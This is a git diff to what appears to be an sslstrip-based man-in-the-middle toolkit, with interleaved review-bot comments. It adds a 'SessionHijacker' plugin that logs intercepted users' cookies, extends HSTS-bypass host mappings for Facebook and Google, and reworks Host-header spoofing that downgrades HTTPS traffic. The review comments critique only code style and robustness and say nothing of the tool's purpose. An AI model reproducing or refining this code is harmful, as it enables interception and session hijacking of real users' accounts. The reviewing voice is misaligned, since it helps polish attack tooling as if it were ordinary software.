diff --git a/config_files/hsts_bypass.cfg b/config_files/hsts_bypass.cfg
index 2b02ed0..06d1ece 100644
--- a/config_files/hsts_bypass.cfg
+++ b/config_files/hsts_bypass.cfg
@@ -7,4 +7,5 @@
 mail.google.com = gmail.google.com
 accounts.google.se = cuentas.google.se
 #for facebook
-www.facebook.com = social.facebook.com
\ No newline at end of file
+www.facebook.com = social.facebook.com
+facebook.com = social.facebook.com
\ No newline at end of file
diff --git a/plugins/SessionHijacker.py b/plugins/SessionHijacker.py
new file mode 100644
index 0000000..22d9259
--- /dev/null
+++ b/plugins/SessionHijacker.py
@@ -0,0 +1,30 @@
+from plugins.plugin import Plugin
+import os
+import argparse
+import logging
+
+class SessionHijacker(Plugin):
+ name = "Session Hijacker"
+ optname = "hijack"
+ desc = "Performs session hijacking attacks against clients"
+ implements = ["sendHeaders"]
+ has_opts = False
+
+ def initialize(self, options):
+ '''Called if plugin is enabled, passed the options namespace'''
+ self.options = options
+ self.log_clients = options.clients
+
+ def sendHeaders(self, request):
+ for header, value in request.headers.items():
+ if header == 'cookie':
+ if self.log_clients:
+ log_file = open('./logs/%s.log', 'a' % request.client.getClientIP())
+ log_file.write(request.header['host'], value, "\n")
+ log_file.close()
+
+ logging.info("%s %s << Wrote cookie to logfile" % (request.client.getClientIP(), request.headers['host']))
+ else:
+ logging.info("%s %s << Got cookie: %s" % (request.client.getClientIP(), request.headers['host'], value))
+
+ #def add_options(options):
\ No newline at end of file
diff --git a/sslstrip/ClientRequest.py b/sslstrip/ClientRequest.py
index 091ef0d..77de420 100644
--- a/sslstrip/ClientRequest.py
+++ b/sslstrip/ClientRequest.py
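Review bot: In plugins/SessionHijacker.py the imports `os` and `argparse` are never used, and the trailing `#def add_options(options):` is a commented-out stub with no body; drop the two imports and either implement the hook or delete the comment. `has_opts = False` declares that the plugin adds no options, yet `initialize` reads `options.clients`, so the plugin silently depends on a `clients` attribute presumably defined by the main parser or another plugin — a comment such as `# relies on the global --clients option` would make that coupling visible. `self.options` is assigned in `initialize` but not read anywhere in the file, so it can go unless the `Plugin` base class expects it. The file is also added without a trailing newline, as the `\ No newline at end of file` marker shows.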
@@ -94,7 +94,10 @@ class ClientRequest(Request):
 client = self.getClientIP()
 path = self.getPathFromUri()
- self.content.seek(0,0)
+ try:
+ self.content.seek(0,0)
+ except:
+ pass
 postData = self.content.read()
 url = 'http://' + host + path
diff --git a/sslstrip/ClientRequestHSTS.py b/sslstrip/ClientRequestHSTS.py
index 260732b..b47c7d7 100644
--- a/sslstrip/ClientRequestHSTS.py
+++ b/sslstrip/ClientRequestHSTS.py
@@ -76,11 +76,22 @@ class ClientRequest(Request):
 del headers['if-none-match']
 if 'host' in headers:
- host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
- logging.debug("Modifing HOST header: %s -> %s" % (headers['host'],host))
- headers['host'] = host
- headers['securelink'] = '1'
- self.setHeader('Host',host)
+ real_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+ #logging.info("Modifing HOST header: %s -> %s" % (headers['host'],host))
+ if 'www.' in real_host:
+ fake_host = 'w' + real_host
+ headers['host'] = fake_host
+ fake_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+ headers['securelink'] = '1'
+ self.setHeader('Host', fake_host)
+ logging.info("Modifing HOST header: %s -> %s" % (real_host,fake_host))
+ else:
+ fake_host = 'web' + real_host
+ headers['host'] = fake_host
+ fake_host = self.urlMonitor.URLgetRealHost("%s" % headers['host'])
+ headers['securelink'] = '1'
+ self.setHeader('Host', fake_host)
+ logging.info("Modifing HOST header: %s -> %s" % (real_host,fake_host))
 return headers
@@ -112,7 +123,12 @@ class ClientRequest(Request):
 host = self.urlMonitor.URLgetRealHost("%s" % lhost)
 client = self.getClientIP()
 path = self.getPathFromUri()
- self.content.seek(0, 0)
+
+ try:
+ self.content.seek(0, 0)
+ except:
+ pass
+
 postData = self.content.read()
 real = self.urlMonitor.real
 patchDict = self.urlMonitor.patchDict
diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py
index 1210c92..d2fd879 100644
--- a/sslstrip/ServerConnection.py
+++ b/sslstrip/ServerConnection.py
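Review bot: The `try`/`except: pass` added around `self.content.seek(0,0)` is a bare except, so it also swallows `KeyboardInterrupt`, `SystemExit` and any unrelated bug, and the following `self.content.read()` then runs on whatever state the failed seek left behind with nothing in the log to explain it. Catch only what a seek on a closed or non-seekable buffer raises and record it, e.g. `except (ValueError, IOError, AttributeError) as e:` followed by `logging.debug("seek on request body failed: %s", e)`. The same pattern is added in the second hunk of sslstrip/ClientRequestHSTS.py and in sslstrip/ServerConnectionFactory.py around `self.client.finish()`, and the same narrowing applies there. The enclosing method starts before this hunk.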
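Review bot: In the first hunk of sslstrip/ClientRequestHSTS.py the `if 'www.' in real_host:` and `else:` branches are identical apart from the prefix literal, so the five trailing statements should be written once, e.g. `prefix = 'w' if 'www.' in real_host else 'web'` and then a single `fake_host = prefix + real_host`. Within each branch `fake_host` is assigned twice — the second `fake_host = self.urlMonitor.URLgetRealHost(...)` overwrites the prefixed value with whatever the monitor returns, so the name no longer describes its contents; give the second result its own name such as `mapped_host`. Note also that `'www.' in real_host` is a substring test while sslstrip/URLMonitorHSTS.py decides the same prefix with `host[:4]=="www."`, so the two sites can disagree for the same host; one rule should be shared. The enclosing method starts before this hunk.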
@@ -54,7 +54,7 @@ class ServerConnection(HTTPClient):
 def sendRequest(self):
 if self.command == 'GET':
- logging.info("%s Sending Request: %s %s" % (self.client.getClientIP(), self.command, self.headers['host']))
+ logging.info("%s Sending Request: %s %s %s" % (self.client.getClientIP(), self.command, self.headers['host'], self.headers['user-agent']))
 self.plugins.hook()
 self.sendCommand(self.command, self.uri)
@@ -100,8 +100,8 @@ class ServerConnection(HTTPClient):
 if (value.find('gzip') != -1):
 logging.debug("Response is compressed...")
 self.isCompressed = True
- if (key.lower() == 'strict-transport-security'):
- value = 'max-age=0'
+ #if (key.lower() == 'strict-transport-security'):
+ # value = 'max-age=0'
 elif (key.lower() == 'content-length'):
 self.contentLength = value
diff --git a/sslstrip/ServerConnectionFactory.py b/sslstrip/ServerConnectionFactory.py
index 793bdc6..f694fc0 100644
--- a/sslstrip/ServerConnectionFactory.py
+++ b/sslstrip/ServerConnectionFactory.py
@@ -40,5 +40,7 @@ class ServerConnectionFactory(ClientFactory):
 logging.debug("Retrying via SSL")
 self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
 else:
- self.client.finish()
-
+ try:
+ self.client.finish()
+ except:
+ pass
diff --git a/sslstrip/URLMonitorHSTS.py b/sslstrip/URLMonitorHSTS.py
index 35262ce..164da92 100644
--- a/sslstrip/URLMonitorHSTS.py
+++ b/sslstrip/URLMonitorHSTS.py
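Review bot: The new log line in `sendRequest` indexes `self.headers['user-agent']` directly, which raises `KeyError` for any request that carries no User-Agent header and aborts the method before `self.sendCommand` is reached; use `self.headers.get('user-agent', '')` in the format tuple, as the existing `'host'` lookup is the only key the code elsewhere treats as guaranteed. In the second hunk the `strict-transport-security` branch is commented out rather than removed — if it is no longer wanted, delete the two lines and let version control keep the history, since commented-out code drifts out of sync with the surrounding `if`/`elif` chain. The enclosing methods start before each hunk.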
@@ -64,14 +64,14 @@ class URLMonitor:
 #LEO: Sustituir HOST
 if not self.sustitucion.has_key(host):
- lhost = host[:4]
- if lhost=="www.":
+ lhost = host[:4]
+ if lhost=="www.":
 self.sustitucion[host] = "w"+host
 self.real["w"+host] = host
- else:
+ else:
 self.sustitucion[host] = "web"+host
 self.real["web"+host] = host
- #logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
+ logging.info("LEO: ssl host (%s) tokenized (%s)" % (host,self.sustitucion[host]) )
 url = 'http://' + host + path
 #logging.debug("LEO stripped URL: %s %s"%(client, url))
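Review bot: `self.sustitucion.has_key(host)` on the context line directly above the re-indented block is Python 2 only (`dict.has_key` does not exist in Python 3); since this hunk already touches the block, `if host not in self.sustitucion:` is the portable spelling and reads better. The hunk re-indents `lhost = host[:4]`, `if lhost=="www.":` and `else:` without changing them, which suggests a tab/space mix in the original file — a whitespace-only pass over the whole file would keep future diffs from being dominated by it. Uncommenting `logging.info("LEO: ssl host (%s) tokenized (%s)" ...)` emits at INFO for every newly seen host, whereas the neighbouring `#logging.debug("LEO stripped URL: ...")` line treats this kind of trace as DEBUG; the two should agree. The enclosing method starts before this hunk.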